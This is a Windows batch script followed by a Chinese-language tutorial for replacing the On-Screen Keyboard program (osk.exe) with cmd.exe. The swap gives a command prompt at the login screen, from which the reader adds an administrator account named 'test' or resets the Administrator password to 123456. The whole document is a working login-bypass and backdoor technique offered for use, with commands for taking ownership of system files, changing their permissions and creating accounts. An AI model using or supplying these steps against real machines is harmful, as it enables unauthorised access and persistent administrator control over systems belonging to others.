@echo off
echo 正在修改权限....
takeown /f %windir%\system32\cmd.exe /A >nul
echo.
takeown /f %windir%\system32\osk.exe /A >nul
echo.
echo y|cacls %windir%\system32\osk.exe /A /R >nul
echo y|cacls.exe c:\windows\system32\cmd.exe /E /C /P Administrator:f
echo y|cacls.exe c:\windows\system32\osk.exe /E /C /P Administrator:f
echo.
ren c:\windows\system32\osk.exe osk1.exe
ren c:\windows\system32\cmd.exe osk.exe
echo.
echo 请按任意键退出
pause >nul
以“屏幕键盘”程序为例子,其文件名本来是osk.exe,我们将之改名为osk1.exe,之后再复制一份cmd.exe,并将其改名为osk.exe,伪装为屏幕键盘程序。这样,在登录界面就可以直接运行cmd.exe程序了!
步骤,以下都是命令行执行的命令:
c:
cd c:\windows\system32
ren osk.exe osk1.exe
copy cmd.exe osk.exe
假设你的win7装在C盘。
做完这一步以后,重启计算机,从硬盘启动系统。在登录界面单击右下角的“轻松访问”按钮,在打开的窗口勾选“屏幕键盘”,启动cmd窗口,这里有两种方法:
a.添加一个管理员用户test,输入命令:
net user test /add
netlocalgroup administrators test/add
上面这两行添加一个叫test的管理员账号。
b.修改已存在账号的密码,输入命令:
net user administrator 123456
将管理员账号 administrator 的密码重置为123456
